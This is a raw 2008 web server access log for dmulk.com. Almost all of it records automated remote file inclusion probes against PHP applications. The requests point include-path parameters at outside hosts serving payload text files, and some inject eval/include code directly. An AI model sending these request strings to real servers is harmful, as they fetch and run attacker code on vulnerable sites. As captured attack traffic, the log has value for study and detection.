218.234.23.56 - - [29/Nov/2008:09:21:40 -0800] "GET /components/com_zoom/includes/database.php?mosConfig_absolute_path=http://wildfood.co.kr/home//data/pandega.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
218.234.23.56 - - [29/Nov/2008:09:21:41 -0800] "GET /logs//components/com_zoom/includes/database.php?mosConfig_absolute_path=http://wildfood.co.kr/home//data/pandega.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
218.234.23.56 - - [29/Nov/2008:09:21:41 -0800] "GET /logs//components/com_zoom/includes/database.php?mosConfig_absolute_path=http://wildfood.co.kr/home//data/pandega.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
218.38.12.178 - - [29/Nov/2008:09:21:42 -0800] "GET /logs/access_080507.log/phphtml.php?htmlclass_path=http://www.samilglass.com/images/v6id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
218.38.12.178 - - [29/Nov/2008:09:21:43 -0800] "GET /phphtml.php?htmlclass_path=http://www.samilglass.com/images/v6id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
218.38.12.178 - - [29/Nov/2008:09:21:43 -0800] "GET /logs/phphtml.php?htmlclass_path=http://www.samilglass.com/images/v6id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
203.215.243.76 - - [29/Nov/2008:09:21:48 -0800] "GET /logs/access_080325.log%20/Forums/admin/admin_board.php?phpbb_root_path=http://www.seanbatt.com/id.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
75.125.207.2 - - [29/Nov/2008:09:22:05 -0800] "GET /logs/access_080401.log%20%20//modules/xoopsgallery/init_basic.php?GALLERY_BASEDIR=http://ragas.baarleweb.net/data/sobi/copyright.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
75.125.207.2 - - [29/Nov/2008:09:22:05 -0800] "GET /logs//modules/xoopsgallery/init_basic.php?GALLERY_BASEDIR=http://ragas.baarleweb.net/data/sobi/copyright.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
75.125.207.2 - - [29/Nov/2008:09:22:05 -0800] "GET /modules/xoopsgallery/init_basic.php?GALLERY_BASEDIR=http://ragas.baarleweb.net/data/sobi/copyright.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
75.125.207.2 - - [29/Nov/2008:09:22:08 -0800] "GET /logs/access_080521.log%20%20//modules/xoopsgallery/init_basic.php?GALLERY_BASEDIR=http://ragas.baarleweb.net/data/sobi/copyright.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
219.85.63.226 - - [29/Nov/2008:09:22:16 -0800] "GET /logs/access_080714.log/?sourcedir=http://www.stormpages.com/cindy/idfeelcomz.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-GB; rv:1.8.0.1) Gecko/20060111 Firefox/1.5.0.1" "www.dmulk.com"
217.147.211.194 - - [29/Nov/2008:09:22:20 -0800] "GET /logs/access_080614.log/assets/snippets/reflect/snippet.reflect.php?reflect_base=http://www.tecfedericotaylor.edu.gt/gif/prc.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
217.147.211.194 - - [29/Nov/2008:09:22:20 -0800] "GET /assets/snippets/reflect/snippet.reflect.php?reflect_base=http://www.tecfedericotaylor.edu.gt/gif/prc.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
217.147.211.194 - - [29/Nov/2008:09:22:21 -0800] "GET /logs/assets/snippets/reflect/snippet.reflect.php?reflect_base=http://www.tecfedericotaylor.edu.gt/gif/prc.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
80.67.20.101 - - [29/Nov/2008:09:22:31 -0800] "GET /logs/access_081108.log//projects/gantt.php?dPconfig[root_dir]=http://musicsalang.com//technote7/data/board/kkkgallery/file/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
80.67.20.101 - - [29/Nov/2008:09:22:31 -0800] "GET /projects/gantt.php?dPconfig[root_dir]=http://musicsalang.com//technote7/data/board/kkkgallery/file/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
80.67.20.101 - - [29/Nov/2008:09:22:32 -0800] "GET /logs//projects/gantt.php?dPconfig[root_dir]=http://musicsalang.com//technote7/data/board/kkkgallery/file/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
80.67.20.101 - - [29/Nov/2008:09:22:33 -0800] "GET /logs/access_081009.log//projects/gantt.php?dPconfig[root_dir]=http://musicsalang.com//technote7/data/board/kkkgallery/file/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
75.125.207.2 - - [29/Nov/2008:09:22:44 -0800] "GET /logs//weather/hw3.php//hw3.php?daysonly=0).include($_GET[file]).(0&file=http://ragas.baarleweb.net/data/sobi/copyright.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
75.125.207.2 - - [29/Nov/2008:09:22:44 -0800] "GET /weather/hw3.php//hw3.php?daysonly=0).include($_GET[file]).(0&file=http://ragas.baarleweb.net/data/sobi/copyright.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
75.125.207.2 - - [29/Nov/2008:09:22:44 -0800] "GET /logs/access_081117.log%20%20//weather/hw3.php//hw3.php?daysonly=0).include($_GET[file]).(0&file=http://ragas.baarleweb.net/data/sobi/copyright.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
75.125.207.2 - - [29/Nov/2008:09:22:44 -0800] "GET /logs/access_080912.log%20%20//weather/hw3.php//hw3.php?daysonly=0).include($_GET[file]).(0&file=http://ragas.baarleweb.net/data/sobi/copyright.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
87.94.1.95 - - [29/Nov/2008:09:22:45 -0800] "GET /logs/access_081016.log/skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://www.100nx-fanpage.de/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
87.94.1.95 - - [29/Nov/2008:09:22:45 -0800] "GET /skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://www.100nx-fanpage.de/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
87.94.1.95 - - [29/Nov/2008:09:22:46 -0800] "GET /logs/skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://www.100nx-fanpage.de/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
219.85.63.226 - - [29/Nov/2008:09:23:22 -0800] "GET /logs/access_080218.log/?sourcedir=http://www.stormpages.com/cindy/idfeelcomz.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-GB; rv:1.8.0.1) Gecko/20060111 Firefox/1.5.0.1" "www.dmulk.com"
218.38.12.178 - - [29/Nov/2008:09:23:23 -0800] "GET /logs/access_080819.log/phphtml.php?htmlclass_path=http://www.samilglass.com/images/v6id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
83.149.99.174 - - [29/Nov/2008:09:23:33 -0800] "GET /logs//modules/xfsection/modify.php?dir_module=http://genomelife.com/ecology/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
83.149.99.174 - - [29/Nov/2008:09:23:33 -0800] "GET /modules/xfsection/modify.php?dir_module=http://genomelife.com/ecology/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
83.149.99.174 - - [29/Nov/2008:09:23:33 -0800] "GET /logs/access_080513.log//modules/xfsection/modify.php?dir_module=http://genomelife.com/ecology/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
195.114.29.130 - - [29/Nov/2008:09:23:45 -0800] "GET /logs/access_080928.log//common/db.php?commonpath=http://musicsalang.com//technote7/data/board/kkkgallery/file/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
195.114.29.130 - - [29/Nov/2008:09:23:46 -0800] "GET /common/db.php?commonpath=http://musicsalang.com//technote7/data/board/kkkgallery/file/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
195.114.29.130 - - [29/Nov/2008:09:23:46 -0800] "GET /logs//common/db.php?commonpath=http://musicsalang.com//technote7/data/board/kkkgallery/file/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
83.149.99.174 - - [29/Nov/2008:09:23:48 -0800] "GET /logs/access_080507.log//modules/xfsection/modify.php?dir_module=http://genomelife.com/ecology/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
83.149.99.174 - - [29/Nov/2008:09:24:02 -0800] "GET /modules/xfsection/modify.php?dir_module=http://genomelife.com/ecology/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
83.149.99.174 - - [29/Nov/2008:09:24:02 -0800] "GET /logs//modules/xfsection/modify.php?dir_module=http://genomelife.com/ecology/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
83.149.99.174 - - [29/Nov/2008:09:24:02 -0800] "GET /logs/access_080427.log%20%20//modules/xfsection/modify.php?dir_module=http://genomelife.com/ecology/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
83.149.99.174 - - [29/Nov/2008:09:24:19 -0800] "GET /logs/access_080229.log%20%20//modules/xfsection/modify.php?dir_module=http://genomelife.com/ecology/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
195.12.53.51 - - [29/Nov/2008:09:24:26 -0800] "GET /logs//browser/resource/categories/resource_categories_view.php?CLASSES_ROOT=http://www.geocities.com/hidayatkhoir/idq.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
195.12.53.51 - - [29/Nov/2008:09:24:27 -0800] "GET /browser/resource/categories/resource_categories_view.php?CLASSES_ROOT=http://www.geocities.com/hidayatkhoir/idq.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
210.120.128.65 - - [29/Nov/2008:09:24:34 -0800] "GET /logs/errors.php?error=http://millionaire-secrets.bikaigroup.us/images/idbut.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
210.120.128.65 - - [29/Nov/2008:09:24:35 -0800] "GET /errors.php?error=http://millionaire-secrets.bikaigroup.us/images/idbut.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
217.147.211.194 - - [29/Nov/2008:09:24:37 -0800] "GET /logs/access_080618.log/assets/snippets/reflect/snippet.reflect.php?reflect_base=http://www.tecfedericotaylor.edu.gt/gif/prc.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
195.12.53.51 - - [29/Nov/2008:09:24:38 -0800] "GET /logs//browser/resource/categories/resource_categories_view.php?CLASSES_ROOT=http://www.geocities.com/rinaputria/idq.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
195.12.53.51 - - [29/Nov/2008:09:24:38 -0800] "GET /browser/resource/categories/resource_categories_view.php?CLASSES_ROOT=http://www.geocities.com/rinaputria/idq.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
218.234.23.56 - - [29/Nov/2008:09:24:39 -0800] "GET /components/com_zoom/includes/database.php?mosConfig_absolute_path=http://wildfood.co.kr/home//data/pandega.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
211.245.23.171 - - [29/Nov/2008:09:24:42 -0800] "GET /adodb-perf-module.inc.php?last_module=zZz_ADOConnection%7B%7Deval($_GET[w]);class%20zZz_ADOConnection%7B%7D//&w=include($_GET[a]);&a=http://www.codeduc.cl/components/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
211.245.23.171 - - [29/Nov/2008:09:24:42 -0800] "GET /logs/access_080919.log//adodb-perf-module.inc.php?last_module=zZz_ADOConnection%7B%7Deval($_GET[w]);class%20zZz_ADOConnection%7B%7D//&w=include($_GET[a]);&a=http://www.codeduc.cl/components/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
211.245.23.171 - - [29/Nov/2008:09:24:42 -0800] "GET /logs//adodb-perf-module.inc.php?last_module=zZz_ADOConnection%7B%7Deval($_GET[w]);class%20zZz_ADOConnection%7B%7D//&w=include($_GET[a]);&a=http://www.codeduc.cl/components/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
64.235.52.184 - - [29/Nov/2008:09:24:42 -0800] "GET /?sourcedir=http://www.hakang.de/agsa/id.txt?? HTTP/1.1" 200 94620 "-" "libwww-perl/5.810" "www.dmulk.com"
211.245.23.171 - - [29/Nov/2008:09:24:42 -0800] "GET /adodb-perf-module.inc.php?last_module=zZz_ADOConnection%7B%7Deval($_GET[w]);class%20zZz_ADOConnection%7B%7D//&w=include($_GET[a]);&a=http://www.codeduc.cl/components/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
211.245.23.171 - - [29/Nov/2008:09:24:42 -0800] "GET /logs//adodb-perf-module.inc.php?last_module=zZz_ADOConnection%7B%7Deval($_GET[w]);class%20zZz_ADOConnection%7B%7D//&w=include($_GET[a]);&a=http://www.codeduc.cl/components/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
211.245.23.171 - - [29/Nov/2008:09:24:43 -0800] "GET /logs/access_080919.log//adodb-perf-module.inc.php?last_module=zZz_ADOConnection%7B%7Deval($_GET[w]);class%20zZz_ADOConnection%7B%7D//&w=include($_GET[a]);&a=http://www.codeduc.cl/components/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
218.38.12.178 - - [29/Nov/2008:09:24:49 -0800] "GET /logs/access_080820.log/phphtml.php?htmlclass_path=http://www.samilglass.com/images/v6id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
80.67.20.214 - - [29/Nov/2008:09:24:54 -0800] "GET /logs/access_081108.log//includes/db_adodb.php?baseDir=http://musicsalang.com//technote7/data/board/kkkgallery/file/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
80.67.20.214 - - [29/Nov/2008:09:24:55 -0800] "GET /includes/db_adodb.php?baseDir=http://musicsalang.com//technote7/data/board/kkkgallery/file/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
80.67.20.214 - - [29/Nov/2008:09:24:55 -0800] "GET /logs//includes/db_adodb.php?baseDir=http://musicsalang.com//technote7/data/board/kkkgallery/file/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
80.67.20.214 - - [29/Nov/2008:09:24:56 -0800] "GET /logs/access_081009.log//includes/db_adodb.php?baseDir=http://musicsalang.com//technote7/data/board/kkkgallery/file/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
87.94.1.95 - - [29/Nov/2008:09:25:01 -0800] "GET /logs/access_081022.log/skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://www.100nx-fanpage.de/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
75.125.207.2 - - [29/Nov/2008:09:25:05 -0800] "GET /logs/access_080106.log//components/errors.php?error=http://ragas.baarleweb.net/data/sobi/copyright.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
66.249.70.41 - - [29/Nov/2008:09:25:22 -0800] "GET /robots.txt HTTP/1.1" 404 275 "-" "Googlebot-Image/1.0" "dmulk.com"
66.249.70.41 - - [29/Nov/2008:09:25:22 -0800] "GET /blog/wp-content/gallery/westoc-2008/picture-074.jpg HTTP/1.1" 200 543648 "-" "Googlebot-Image/1.0" "dmulk.com"
74.6.22.176 - - [29/Nov/2008:09:25:29 -0800] "GET /robots.txt HTTP/1.0" 404 275 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "dmulk.com"
219.106.227.162 - - [29/Nov/2008:09:25:37 -0800] "GET /modules/xoopsgallery/init_basic.php?GALLERY_BASEDIR=http://www.nn.cl/Fotos/Autos/WalterII/Kjetronic/k_jetronic2_files/pw.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
66.40.52.137 - - [29/Nov/2008:09:25:40 -0800] "GET /logs/access_080223.log//administrator/components/com_joomlaflashfun/admin.joomlaflashfun.php?mosConfig_live_site=http://dhcom.co.kr/zboard/id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
66.40.52.137 - - [29/Nov/2008:09:25:40 -0800] "GET /logs//administrator/components/com_joomlaflashfun/admin.joomlaflashfun.php?mosConfig_live_site=http://dhcom.co.kr/zboard/id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
66.40.52.137 - - [29/Nov/2008:09:25:40 -0800] "GET /administrator/components/com_joomlaflashfun/admin.joomlaflashfun.php?mosConfig_live_site=http://dhcom.co.kr/zboard/id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
66.40.52.137 - - [29/Nov/2008:09:25:44 -0800] "GET /logs/access_080211.log//administrator/components/com_joomlaflashfun/admin.joomlaflashfun.php?mosConfig_live_site=http://dhcom.co.kr/zboard/id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
64.235.52.184 - - [29/Nov/2008:09:25:57 -0800] "GET /logs/access_080901.log//ktmllite/includes/ktedit/toolbar.php?dirDepth=http://www.hakang.de/agsa/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
83.149.99.174 - - [29/Nov/2008:09:26:05 -0800] "GET /modules/xfsection/modify.php?dir_module=http://genomelife.com/ecology/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
83.149.99.174 - - [29/Nov/2008:09:26:05 -0800] "GET /logs//modules/xfsection/modify.php?dir_module=http://genomelife.com/ecology/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
83.149.99.174 - - [29/Nov/2008:09:26:05 -0800] "GET /logs/access_080513.log//modules/xfsection/modify.php?dir_module=http://genomelife.com/ecology/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
218.234.23.56 - - [29/Nov/2008:09:26:06 -0800] "GET /logs/access_080326.log//components/com_zoom/includes/database.php?mosConfig_absolute_path=http://wildfood.co.kr/home//data/pandega.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
218.234.23.56 - - [29/Nov/2008:09:26:13 -0800] "GET /logs/access_080326.log//components/com_zoom/includes/database.php?mosConfig_absolute_path=http://wildfood.co.kr/home//data/pandega.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
83.149.99.174 - - [29/Nov/2008:09:26:21 -0800] "GET /logs/access_080507.log//modules/xfsection/modify.php?dir_module=http://genomelife.com/ecology/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
208.64.230.40 - - [29/Nov/2008:09:26:48 -0800] "GET /logs/access_080712.log//load_lang.php?_SERWEB[configdir]=http://musicsalang.com//technote7/data/board/kkkgallery/file/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
208.64.230.40 - - [29/Nov/2008:09:26:48 -0800] "GET /load_lang.php?_SERWEB[configdir]=http://musicsalang.com//technote7/data/board/kkkgallery/file/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
208.64.230.40 - - [29/Nov/2008:09:26:48 -0800] "GET /logs//load_lang.php?_SERWEB[configdir]=http://musicsalang.com//technote7/data/board/kkkgallery/file/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
218.239.45.184 - - [29/Nov/2008:09:27:13 -0800] "GET /logs/scripts.log//tools/send_reminders.php?noSet=0&includedir=http://220.134.244.157/xoops/templates_c/id3.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
218.239.45.184 - - [29/Nov/2008:09:27:13 -0800] "GET /tools/send_reminders.php?noSet=0&includedir=http://220.134.244.157/xoops/templates_c/id3.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
218.239.45.184 - - [29/Nov/2008:09:27:13 -0800] "GET /logs//tools/send_reminders.php?noSet=0&includedir=http://220.134.244.157/xoops/templates_c/id3.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
62.44.72.170 - - [29/Nov/2008:09:27:34 -0800] "GET /logs/access_080321.log//core/pdf.php?config[pdf_module]=http://www.topgas.co.uk/forum/succes?http://www.fmweb.it/images/save_7.png?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
62.44.72.170 - - [29/Nov/2008:09:27:35 -0800] "GET /core/pdf.php?config[pdf_module]=http://www.topgas.co.uk/forum/succes?http://www.fmweb.it/images/save_7.png?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
62.44.72.170 - - [29/Nov/2008:09:27:35 -0800] "GET /logs//core/pdf.php?config[pdf_module]=http://www.topgas.co.uk/forum/succes?http://www.fmweb.it/images/save_7.png?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
72.13.180.43 - - [29/Nov/2008:09:27:48 -0800] "GET /logs/access_080401.log//modules/xoopsgallery/init_basic.php?GALLERY_BASEDIR=http://www.nn.cl/Fotos/Autos/WalterII/Kjetronic/k_jetronic2_files/pw.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
72.13.180.43 - - [29/Nov/2008:09:27:49 -0800] "GET /modules/xoopsgallery/init_basic.php?GALLERY_BASEDIR=http://www.nn.cl/Fotos/Autos/WalterII/Kjetronic/k_jetronic2_files/pw.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
72.13.180.43 - - [29/Nov/2008:09:27:49 -0800] "GET /logs//modules/xoopsgallery/init_basic.php?GALLERY_BASEDIR=http://www.nn.cl/Fotos/Autos/WalterII/Kjetronic/k_jetronic2_files/pw.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
66.40.52.137 - - [29/Nov/2008:09:27:49 -0800] "GET /logs/access_080223.log%20%20//administrator/components/com_joomlaflashfun/admin.joomlaflashfun.php?mosConfig_live_site=http://dhcom.co.kr/zboard/id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
66.40.52.137 - - [29/Nov/2008:09:27:49 -0800] "GET /logs/access_080211.log%20%20//administrator/components/com_joomlaflashfun/admin.joomlaflashfun.php?mosConfig_live_site=http://dhcom.co.kr/zboard/id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
75.125.207.2 - - [29/Nov/2008:09:27:55 -0800] "GET /logs/access_080401.log//modules/xoopsgallery/init_basic.php?GALLERY_BASEDIR=http://ragas.baarleweb.net/data/sobi/copyright.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
75.125.207.2 - - [29/Nov/2008:09:27:55 -0800] "GET /logs/access_080521.log//modules/xoopsgallery/init_basic.php?GALLERY_BASEDIR=http://ragas.baarleweb.net/data/sobi/copyright.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
81.176.67.220 - - [29/Nov/2008:09:27:59 -0800] "GET /logs/administrator/components/com_peoplebook/param.peoplebook.php?mosConfig_absolute_path=http://www.geocities.com/pertaminux/albania.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
81.176.67.220 - - [29/Nov/2008:09:28:00 -0800] "GET /administrator/components/com_peoplebook/param.peoplebook.php?mosConfig_absolute_path=http://www.geocities.com/pertaminux/albania.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
81.176.67.220 - - [29/Nov/2008:09:28:02 -0800] "GET /logs/administrator/components/com_peoplebook/param.peoplebook.php?mosConfig_absolute_path=http://www.geocities.com/pertaminux/albania.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
81.176.67.220 - - [29/Nov/2008:09:28:02 -0800] "GET /administrator/components/com_peoplebook/param.peoplebook.php?mosConfig_absolute_path=http://www.geocities.com/pertaminux/albania.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
195.12.53.51 - - [29/Nov/2008:09:28:09 -0800] "GET /logs/access_081108.log//naboard_pnr.php?skin=http://www.geocities.com/hidayatkhoir/idku.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
195.12.53.51 - - [29/Nov/2008:09:28:09 -0800] "GET /naboard_pnr.php?skin=http://www.geocities.com/hidayatkhoir/idku.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
195.12.53.51 - - [29/Nov/2008:09:28:09 -0800] "GET /logs//naboard_pnr.php?skin=http://www.geocities.com/hidayatkhoir/idku.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
74.54.16.82 - - [29/Nov/2008:09:28:12 -0800] "GET /logs/access_081117.log//weather/hw3.php//hw3.php?daysonly=0).include($_GET[file]).(0&file=http://sior.org/zero/build/pw.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
74.54.16.82 - - [29/Nov/2008:09:28:13 -0800] "GET /weather/hw3.php//hw3.php?daysonly=0).include($_GET[file]).(0&file=http://sior.org/zero/build/pw.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
74.54.16.82 - - [29/Nov/2008:09:28:13 -0800] "GET /logs//weather/hw3.php//hw3.php?daysonly=0).include($_GET[file]).(0&file=http://sior.org/zero/build/pw.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
195.12.53.51 - - [29/Nov/2008:09:28:15 -0800] "GET /logs/access_081108.log//naboard_pnr.php?skin=http://www.geocities.com/nurhendri63/idku.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
195.12.53.51 - - [29/Nov/2008:09:28:15 -0800] "GET /naboard_pnr.php?skin=http://www.geocities.com/nurhendri63/idku.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
195.114.29.130 - - [29/Nov/2008:09:28:17 -0800] "GET /logs/access_080506.log//common/db.php?commonpath=http://musicsalang.com//technote7/data/board/kkkgallery/file/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
195.12.53.51 - - [29/Nov/2008:09:28:18 -0800] "GET /logs//naboard_pnr.php?skin=http://www.geocities.com/nurhendri63/idku.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
72.13.180.43 - - [29/Nov/2008:09:28:20 -0800] "GET /logs/access_080521.log//modules/xoopsgallery/init_basic.php?GALLERY_BASEDIR=http://www.nn.cl/Fotos/Autos/WalterII/Kjetronic/k_jetronic2_files/pw.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
64.235.52.184 - - [29/Nov/2008:09:28:32 -0800] "GET /logs/access_081117.log//weather/hw3.php//hw3.php?daysonly=0).include($_GET[file]).(0&file=http://www.hakang.de/agsa/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
64.235.52.184 - - [29/Nov/2008:09:28:32 -0800] "GET /weather/hw3.php//hw3.php?daysonly=0).include($_GET[file]).(0&file=http://www.hakang.de/agsa/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
64.235.52.184 - - [29/Nov/2008:09:28:32 -0800] "GET /logs//weather/hw3.php//hw3.php?daysonly=0).include($_GET[file]).(0&file=http://www.hakang.de/agsa/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
74.54.16.82 - - [29/Nov/2008:09:28:36 -0800] "GET /logs/access_080912.log//weather/hw3.php//hw3.php?daysonly=0).include($_GET[file]).(0&file=http://sior.org/zero/build/pw.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
74.55.13.210 - - [29/Nov/2008:09:28:50 -0800] "GET /multithumb/multithumb.php?mosConfig_absolute_path=http://wildfood.co.kr/home//data/pandega.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
